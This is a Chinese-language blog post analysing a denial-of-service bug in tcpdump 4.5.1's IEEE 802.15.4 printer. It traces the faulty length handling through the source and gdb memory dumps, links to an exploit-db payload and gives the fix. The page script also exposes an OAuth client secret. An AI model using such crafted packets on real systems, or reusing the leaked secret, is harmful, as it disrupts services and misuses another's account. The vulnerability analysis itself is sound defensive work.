< p > 由此可见, 从main函数开始了一连串函数调用, git源码下来看看。< br > tcpdump.c找到pcap_loop调用< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. do { < / span > < br > < span class = "line" > 2. status = pcap_loop(pd, cnt, callback, pcap_userdata);< / span > < br > < span class = "line" > 3. if (WFileName == NULL) { < / span > < br > < span class = "line" > 4. /*< / span > < br > < span class = "line" > 5. * We' re printing packets. Flush the printed output,< / span > < br > < span class = "line" > 6. * so it doesn' t get intermingled with error output.< / span > < br > < span class = "line" > 7. */< / span > < br > < span class = "line" > 8. if (status == -2) { < / span > < br > < span class = "line" > 9. /*< / span > < br > < span class = "line" > 10. * We got interrupted, so perhaps we didn' t< / span > < br > < span class = "line" > 11. * manage to finish a line we were printing.< / span > < br > < span class = "line" > 12. * Print an extra newline, just in case.< / span > < br > < span class = "line" > 13. */< / span > < br > < span class = "line" > 14. putchar(' n' );< / span > < br > < span class = "line" > 15. } < / span > < br > < span class = "line" > 16. (void)fflush(stdout);< / span > < br > < span class = "line" > 17. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 设置断点之后查看一下该函数的执行结果< / p >
< p > pcap_loop通过callback指向print_packet,来看一下它的源码< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. static void< / span > < br > < span class = "line" > 2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)< / span > < br > < span class = "line" > 3. { < / span > < br > < span class = "line" > 4. struct print_info *print_info;< / span > < br > < span class = "line" > 5. u_int hdrlen;< / span > < br > < span class = "line" > 6. ++packets_captured;< / span > < br > < span class = "line" > 7. ++infodelay;< / span > < br > < span class = "line" > 8. ts_print(& h-> ts);< / span > < br > < span class = "line" > 9. print_info = (struct print_info *)user;< / span > < br > < span class = "line" > 10. /*< / span > < br > < span class = "line" > 11. * Some printers want to check that they' re not walking off the< / span > < br > < span class = "line" > 12. * end of the packet.< / span > < br > < span class = "line" > 13. * Rather than pass it all the way down, we set this global.< / span > < br > < span class = "line" > 14. */< / span > < br > < span class = "line" > 15. snapend = sp + h-> caplen;< / span > < br > < span class = "line" > 16. if(print_info-> ndo_type) { < / span > < br > < span class = "line" > 17. hdrlen = (*print_info-> p.ndo_printer)(print_info-> ndo, h, sp);< ====< / span > < br > < span class = "line" > 18. } else { < / span > < br > < span class = "line" > 19. hdrlen = (*print_info-> p.printer)(h, sp);< / span > < br > < span class = "line" > 20. } < / span > < br > < span class = "line" > 21. putchar(' n' );< / span > < br > < span class = "line" > 22. --infodelay;< / span > < br > < span class = "line" > 23. if (infoprint)< / span > < br > < span class = "line" > 24. info(0);} < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 同样设置断点看该函数是如何调用执行的< / p >
< p > 这是我们可以根据call的信息, 计算出调用的函数名< / p >
< p > 其中(*print_info-> p.ndo_printer)(print_info-> ndo,h,sp)指向ieee802_15_4_if_print< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < span class = "line" > 68< / span > < br > < span class = "line" > 69< / span > < br > < span class = "line" > 70< / span > < br > < span class = "line" > 71< / span > < br > < span class = "line" > 72< / span > < br > < span class = "line" > 73< / span > < br > < span class = "line" > 74< / span > < br > < span class = "line" > 75< / span > < br > < span class = "line" > 76< / span > < br > < span class = "line" > 77< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 25. u_int< / span > < br > < span class = "line" > 26. ieee802_15_4_if_print(struct netdissect_options *ndo,< / span > < br > < span class = "line" > 27. const struct pcap_pkthdr *h, const u_char *p)< / span > < br > < span class = "line" > 28. { < / span > < br > < span class = "line" > 29. printf(" address : %x\n" ,p);< / span > < br > < span class = "line" > 30. u_int caplen = h-> caplen; //传入的caplen, 赋值给无符号整形变量caplen,且该值为8< / span > < br > < span class = "line" > 31. int hdrlen;< / span > < br > < span class = "line" > 32. u_int16_t fc;< / span > < br > < span class = "line" > 33. u_int8_t seq;< / span > < br > < span class = "line" > 34. if (caplen < 3) { //不满足< / span > < br > < span class = "line" > 35. ND_PRINT((ndo, " [|802.15.4] %x" , caplen));< / span > < br > < span class = "line" > 36. return caplen;< / span > < br > < span class = "line" > 37. } < / span > < br > < span class = "line" > 38. fc = EXTRACT_LE_16BITS(p);< / span > < br > < span class = "line" > 39. hdrlen = extract_header_length(fc);< / span > < br > < span class = "line" > 40. seq = EXTRACT_LE_8BITS(p + 2);< / span > < br > < span class = "line" > 41. p += 3;< / span > < br > < span class = "line" > 42. caplen -= 3;//此时caplen = 5< / span > < br > < span class = "line" > 43. ND_PRINT((ndo," IEEE 802.15.4 %s packet " , ftypes[fc & 0x7]));< / span > < br > < span class = "line" > 44. if (vflag)< / span > < br > < span class = "line" > 45. ND_PRINT((ndo," seq %02x " , seq));< / span > < br > < span class = "line" > 46. if (hdrlen == -1) { < / span > < br > < span class = "line" > 47. ND_PRINT((ndo," malformed! " ));< / span > < br > < span class = "line" > 48. return caplen;< / span > < br
< p > 传入的第二个值是struct pcap_pkthdr *h结构体, 函数使用的参数caplen就是结构体中的caplen, 不难看出, caplen进行一些加减操作后, 没有判断正负, 直接丢给了下一个函数使用。< br > 直接跟进函数,看看最后赋值情况< / p >
< p > 从源码和调试信息可以看到libpcap在处理不正常包时不严谨, 导致包的头长度hdrlen竟然大于捕获包长度caplen, 并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数, 导致caplen==0xfffffff3过长。< br > 继续跟进hex_and_asciii_print(ndo_default_print)< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_and_ascii_print(register const char *ident, register const u_char *cp,< / span > < br > < span class = "line" > 3. register u_int length)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. hex_and_ascii_print_with_offset(ident, cp, length, 0);< / span > < br > < span class = "line" > 6. } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > 其中length==0xfffffff3, 继续执行< / span > < br > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,< / span > < br > < span class = "line" > 3. register u_int oset)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. register u_int i, s;< / span > < br > < span class = "line" > 6. register int nshorts;< / span > < br > < span class = "line" > 7.< / span > < br > < span class = "line" > 8. nshorts = (u_int) length / sizeof(u_short);< / span > < br > < span class = "line" > 9. i = 0;< / span > < br > < span class = "line" > 10. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 11. if ((i++ % 8) == 0) { < / span > < br > < span class = "line" > 12. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 13. oset += HEXDUMP_BYTES_PER_LINE;< / span > < br > < span class = "line" > 14. } < / span > < br > < span class = "line" > 15. s = *cp++; < ======= 抛出错误位置< / span > < br > < span class = "line" > 16. (void)printf(" %02x%02x" , s, *cp++);< / span > < br > < span class = "line" > 17. } < / span > < br > < span class = "line" > 18. if (length & 1) { < / span > < br > < span class = "line" > 19. if ((i % 8) == 0)< / span > < br > < span class = "line" > 20. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 21. (void)printf(" %02x" , *cp);< / span > < br > < span class = "line" > 22. } < / span > < br > < span class = "line" > nshorts=(u_int) length / sizeof(u_short) => nshorts=0xfffffff3/2= 7FFFFFF9 < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 但数据包数据没有这么长, 导致了crash。< / p >
< h3 id = "3-内存分析" > < a href = "#3-内存分析" class = "headerlink" title = "3.内存分析" > < / a > 3.内存分析< / h3 > < p > 仔细分析之后发现, 通过len判断的这个长度并没有进行控制, 如果是自己构造的一个超长len的数据包, 则会连续读取到不可估计的值。< br > 通过查看epx的值来看一下这个内存到底开辟到什么位置< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. gdb-peda$ x/10000000x 0x81e33bd< / span > < br > < span class = "line" > 2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x00000000< / span > < br > < span class = "line" > 3. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x00000000< / span > < br > < span class = "line" > 4. 0x8203ffd: Cannot access memory at address 0x8204000< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 可以看到, 到达0x 8204000附近的时候, 就是无法读取的无效地址了, 那么初始值为0x 81e33bd, 用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40, 因为ebx+ebp*2+0x1一次读取两个字节, 那么循环计数器就要除以2, 最后结果为0x 10620。< br > 来看一下到达拒绝服务位置读取的长度: EBX: 0x81e33bd – > 0x0; EBP: 0x10621; < br > EBP刚好为10621。正是不可读取内存空间的地址, 因此造成拒绝服务。< / p >
< h3 id = "4-漏洞总结" > < a href = "#4-漏洞总结" class = "headerlink" title = "4.漏洞总结" > < / a > 4.漏洞总结< / h3 > < p > 总结一下整个漏洞触发过程, 首先tcpdump会读取恶意构造的pcap包, 在构造pcap包的时候, 设置一个超长的数据包长度, tcpdump会根据len的长度去读取保存在内存空间数据包的内容, 当引用到不可读取内存位置时, 会由于引用不可读指针, 造成拒绝服务漏洞。< / p >
< h2 id = "五、漏洞修补" > < a href = "#五、漏洞修补" class = "headerlink" title = "五、漏洞修补" > < / a > 五、漏洞修补< / h2 > < p > Libpcap依然是apt安装的默认版本, tcpdump使用4.7 .0-bp版本< br > 在hex_and_ascii_print_with_offset中增加对caplength的判断< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. caplength = (ndo-> ndo_snapend > = cp) ? ndo-> ndo_snapend - cp : 0;< / span > < br > < span class = "line" > 2. if (length > caplength)< / span > < br > < span class = "line" > 3. length = caplength;< / span > < br > < span class = "line" > 4. nshorts = length / sizeof(u_short);< / span > < br > < span class = "line" > 5. i = 0;< / span > < br > < span class = "line" > 6. hsp = hexstuff; asp = asciistuff;< / span > < br > < span class = "line" > 7. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 8. ...< / span > < br > < span class = "line" > 9. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 可以看到执行完caplength = (ndo-> ndo_snapend > = cp) ? ndo-> ndo_snapend - cp : 0;, caplength为0, 继续执行, 可以推出length同样为0, 到这里已经不会发生错误了。< / p >
< p > 参考< br > < a href = "https://www.exploit-db.com/exploits/39875/" target = "_blank" rel = "noopener" > exploit-db payload< / a > < br > < a href = "https://whereisk0shl.top/post/2016-10-23-1" target = "_blank" rel = "noopener" > WHEREISK0SHL分析博客< / a > < br > < a href = "https://github.com/the-tcpdump-group" target = "_blank" rel = "noopener" > libpcap/tcpdump源码< / a > < / p >
< / div >
< div >
< div style = "padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;" >
< div > 您的支持将鼓励我继续创作!< / div >
< button id = "rewardButton" disable = "enable" onclick = "var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}" >
< span > 打赏< / span >
< / button >
< div id = "QR" style = "display: none;" >
< div id = "wechat" style = "display: inline-block" >
< img id = "wechat_qr" src = "/images/Wechatpay.png" alt = "Cool-Y 微信支付" >
< p > 微信支付< / p >
< / div >
< div id = "alipay" style = "display: inline-block" >
< img id = "alipay_qr" src = "/images/Alipay.png" alt = "Cool-Y 支付宝" >
< p > 支付宝< / p >
< / div >
< / div >
< / div >
< / div >
< footer class = "post-footer" >
2019-03-23 04:40:50 +00:00
< div class = "post-tags" >
< a href = "/tags/TCPDUMP/" rel = "tag" > # TCPDUMP< / a >
< a href = "/tags/拒绝服务攻击/" rel = "tag" > # 拒绝服务攻击< / a >
< / div >
2019-03-23 04:36:08 +00:00
< div class = "post-nav" >
< div class = "post-nav-next post-nav-item" >
2019-03-23 04:42:19 +00:00
< a href = "/2018/12/23/基于规则引擎发现IOT设备/" rel = "next" title = "Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices" >
< i class = "fa fa-chevron-left" > < / i > Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices
2019-03-23 04:36:08 +00:00
< / a >
< / div >
< span class = "post-nav-divider" > < / span >
< div class = "post-nav-prev post-nav-item" >
2019-03-23 04:42:19 +00:00
< a href = "/2019/01/16/wifi半双工侧信道攻击学习笔记/" rel = "prev" title = "wifi半双工侧信道攻击学习笔记" >
wifi半双工侧信道攻击学习笔记 < i class = "fa fa-chevron-right" > < / i >
< / a >
2019-03-23 04:36:08 +00:00
< / div >
< / div >
< / footer >
< / div >
< / article >
< div class = "post-spread" >
< / div >
< / div >
< / div >
< div class = "comments" id = "comments" >
< div id = "gitment-container" > < / div >
< / div >
< / div >
< div class = "sidebar-toggle" >
< div class = "sidebar-toggle-line-wrap" >
< span class = "sidebar-toggle-line sidebar-toggle-line-first" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-middle" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-last" > < / span >
< / div >
< / div >
< aside id = "sidebar" class = "sidebar" >
< div class = "sidebar-inner" >
< ul class = "sidebar-nav motion-element" >
< li class = "sidebar-nav-toc sidebar-nav-active" data-target = "post-toc-wrap" >
文章目录
< / li >
< li class = "sidebar-nav-overview" data-target = "site-overview-wrap" >
站点概览
< / li >
< / ul >
< section class = "site-overview-wrap sidebar-panel" >
< div class = "site-overview" >
< div class = "site-author motion-element" itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< img class = "site-author-image" itemprop = "image" src = "/images/avatar.png" alt = "Cool-Y" >
< p class = "site-author-name" itemprop = "name" > Cool-Y< / p >
< p class = "site-description motion-element" itemprop = "description" > < / p >
< / div >
< nav class = "site-state motion-element" >
< div class = "site-state-item site-state-posts" >
< a href = "/archives/" >
< span class = "site-state-item-count" > 7< / span >
< span class = "site-state-item-name" > 日志< / span >
< / a >
< / div >
< div class = "site-state-item site-state-categories" >
< a href = "/categories/index.html" >
2019-03-23 04:40:50 +00:00
< span class = "site-state-item-count" > 5< / span >
2019-03-23 04:36:08 +00:00
< span class = "site-state-item-name" > 分类< / span >
< / a >
< / div >
< div class = "site-state-item site-state-tags" >
< a href = "/tags/index.html" >
2019-03-23 04:40:50 +00:00
< span class = "site-state-item-count" > 16< / span >
2019-03-23 04:36:08 +00:00
< span class = "site-state-item-name" > 标签< / span >
< / a >
< / div >
< / nav >
< div class = "links-of-author motion-element" >
< span class = "links-of-author-item" >
< a href = "https://github.com/Cool-Y" target = "_blank" title = "GitHub" >
< i class = "fa fa-fw fa-github" > < / i > GitHub< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "http://weibo.com/HanYanOpenFire" target = "_blank" title = "Weibo" >
< i class = "fa fa-fw fa-weibo" > < / i > Weibo< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "mailto:cool.yim@whu.edu.cn" target = "_blank" title = "E-Mail" >
< i class = "fa fa-fw fa-envelope" > < / i > E-Mail< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "https://www.instagram.com/yan__han/" target = "_blank" title = "Instagram" >
< i class = "fa fa-fw fa-instagram" > < / i > Instagram< / a >
< / span >
< / div >
< / div >
< / section >
<!-- noindex -->
< section class = "post-toc-wrap motion-element sidebar-panel sidebar-panel-active" >
< div class = "post-toc" >
< div class = "post-toc-content" > < ol class = "nav" > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" > < span class = "nav-number" > 1.< / span > < span class = "nav-text" > TCPDUMP 4.5.1 拒绝服务攻击漏洞分析< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#一、Tcpdump介绍" > < span class = "nav-number" > 1.1.< / span > < span class = "nav-text" > 一、Tcpdump介绍< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#二、分析环境" > < span class = "nav-number" > 1.2.< / span > < span class = "nav-text" > 二、分析环境< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#三、漏洞复现" > < span class = "nav-number" > 1.3.< / span > < span class = "nav-text" > 三、漏洞复现< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#1-编译安装tcpdump" > < span class = "nav-number" > 1.3.1.< / span > < span class = "nav-text" > 1.编译安装tcpdump< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#2-生成payload( 来自exploit-db-payload) " > < span class = "nav-number" > 1.3.2.< / span > < span class = "nav-text" > 2.生成payload( 来自exploit-db payload) < / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#四、崩溃分析" > < span class = "nav-number" > 1.4.< / span > < span class = "nav-text" > 四、崩溃分析< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#1-pcap包格式" > < span class = "nav-number" > 1.4.1.< / span > < span class = "nav-text" > 1.pcap包格式< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#2-gdb调试" > < span class = "nav-number" > 1.4.2.< / span > < span class = "nav-text" > 2.gdb调试< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#3-内存分析" > < span class = "nav-number" > 1.4.3.< / span > < span class = "nav-text" > 3.内存分析< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#4-漏洞总结" > < span class = "nav-number" > 1.4.4.< / span > < span class = "nav-text" > 4.漏洞总结< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#五、漏洞修补" > < span class = "nav-number" > 1.5.< / span > < span class = "nav-text" > 五、漏洞修补< / span > < / a > < / li > < / ol > < / li > < / ol > < / div >
< / div >
< / section >
<!-- /noindex -->
< / div >
< / aside >
< / div >
< / main >
< footer id = "footer" class = "footer" >
< div class = "footer-inner" >
< div class = "copyright" > © < span itemprop = "copyrightYear" > 2019< / span >
< span class = "with-love" >
< i class = "fa fa-user" > < / i >
< / span >
< span class = "author" itemprop = "copyrightHolder" > Cool-Y< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-area-chart" > < / i >
< / span >
< span title = "Site words total count" > 11.1k< / span >
< / div >
< div class = "powered-by" > 由 < a class = "theme-link" target = "_blank" href = "https://hexo.io" > Hexo< / a > 强力驱动< / div >
< div class = "busuanzi-count" >
< script async src = "//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" > < / script >
< span class = "site-uv" >
< i class = "fa fa-user" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_uv" > < / span >
< / span >
< span class = "site-pv" >
< i class = "fa fa-eye" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_pv" > < / span >
< / span >
< / div >
< / div >
< / footer >
< div class = "back-to-top" >
< i class = "fa fa-arrow-up" > < / i >
< / div >
< / div >
< script type = "text/javascript" >
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
< / script >
< script type = "text/javascript" src = "/lib/jquery/index.js?v=2.1.3" > < / script >
< script type = "text/javascript" src = "/lib/fastclick/lib/fastclick.min.js?v=1.0.6" > < / script >
< script type = "text/javascript" src = "/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.ui.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5" > < / script >
< script type = "text/javascript" src = "/js/src/utils.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/motion.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/affix.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/schemes/pisces.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scrollspy.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/post-details.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/bootstrap.js?v=5.1.4" > < / script >
<!-- LOCAL: You can save these files to your site and update links -->
< link rel = "stylesheet" href = "https://aimingoo.github.io/gitmint/style/default.css" >
< script src = "https://aimingoo.github.io/gitmint/dist/gitmint.browser.js" > < / script >
<!-- END LOCAL -->
< script type = "text/javascript" >
function renderGitment(){
var gitment = new Gitmint({
id: window.location.pathname,
owner: 'Cool-Y',
repo: 'gitment-comments',
lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
oauth: {
client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
client_id: '180955a2c3ae3d966d9a'
}});
gitment.render('gitment-container');
}
renderGitment();
< / script >
< script type = "text/javascript" >
// Popup Window;
var isfetched = false;
var isXml = true;
// Search DB path;
var search_path = "search.xml";
if (search_path.length === 0) {
search_path = "search.xml";
} else if (/json$/i.test(search_path)) {
isXml = false;
}
var path = "/" + search_path;
// monitor main search box;
var onPopupClose = function (e) {
$('.popup').hide();
$('#local-search-input').val('');
$('.search-result-list').remove();
$('#no-result').remove();
$(".local-search-pop-overlay").remove();
$('body').css('overflow', '');
}
function proceedsearch() {
$("body")
.append('< div class = "search-popup-overlay local-search-pop-overlay" > < / div > ')
.css('overflow', 'hidden');
$('.search-popup-overlay').click(onPopupClose);
$('.popup').toggle();
var $localSearchInput = $('#local-search-input');
$localSearchInput.attr("autocapitalize", "none");
$localSearchInput.attr("autocorrect", "off");
$localSearchInput.focus();
}
// search function;
var searchFunc = function(path, search_id, content_id) {
'use strict';
// start loading animation
$("body")
.append('< div class = "search-popup-overlay local-search-pop-overlay" > ' +
'< div id = "search-loading-icon" > ' +
'< i class = "fa fa-spinner fa-pulse fa-5x fa-fw" > < / i > ' +
'< / div > ' +
'< / div > ')
.css('overflow', 'hidden');
$("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
$.ajax({
url: path,
dataType: isXml ? "xml" : "json",
async: true,
success: function(res) {
// get the contents from search data
isfetched = true;
$('.popup').detach().appendTo('.header-inner');
var datas = isXml ? $("entry", res).map(function() {
return {
title: $("title", this).text(),
content: $("content",this).text(),
url: $("url" , this).text()
};
}).get() : res;
var input = document.getElementById(search_id);
var resultContent = document.getElementById(content_id);
var inputEventFunction = function() {
var searchText = input.value.trim().toLowerCase();
var keywords = searchText.split(/[\s\-]+/);
if (keywords.length > 1) {
keywords.push(searchText);
}
var resultItems = [];
if (searchText.length > 0) {
// perform local searching
datas.forEach(function(data) {
var isMatch = false;
var hitCount = 0;
var searchTextCount = 0;
var title = data.title.trim();
var titleInLowerCase = title.toLowerCase();
var content = data.content.trim().replace(/< [^>]+>/g,"");
var contentInLowerCase = content.toLowerCase();
var articleUrl = decodeURIComponent(data.url);
var indexOfTitle = [];
var indexOfContent = [];
// only match articles with not empty titles
if(title != '') {
keywords.forEach(function(keyword) {
function getIndexByWord(word, text, caseSensitive) {
var wordLen = word.length;
if (wordLen === 0) {
return [];
}
var startPosition = 0, position = [], index = [];
if (!caseSensitive) {
text = text.toLowerCase();
word = word.toLowerCase();
}
while ((position = text.indexOf(word, startPosition)) > -1) {
index.push({position: position, word: word});
startPosition = position + wordLen;
}
return index;
}
indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
});
if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
isMatch = true;
hitCount = indexOfTitle.length + indexOfContent.length;
}
}
// show search results
if (isMatch) {
// sort index by position of keyword
[indexOfTitle, indexOfContent].forEach(function (index) {
index.sort(function (itemLeft, itemRight) {
if (itemRight.position !== itemLeft.position) {
return itemRight.position - itemLeft.position;
} else {
return itemLeft.word.length - itemRight.word.length;
}
});
});
// merge hits into slices
function mergeIntoSlice(text, start, end, index) {
var item = index[index.length - 1];
var position = item.position;
var word = item.word;
var hits = [];
var searchTextCountInSlice = 0;
while (position + word.length < = end & & index.length != 0) {
if (word === searchText) {
searchTextCountInSlice++;
}
hits.push({position: position, length: word.length});
var wordEnd = position + word.length;
// move to next position of hit
index.pop();
while (index.length != 0) {
item = index[index.length - 1];
position = item.position;
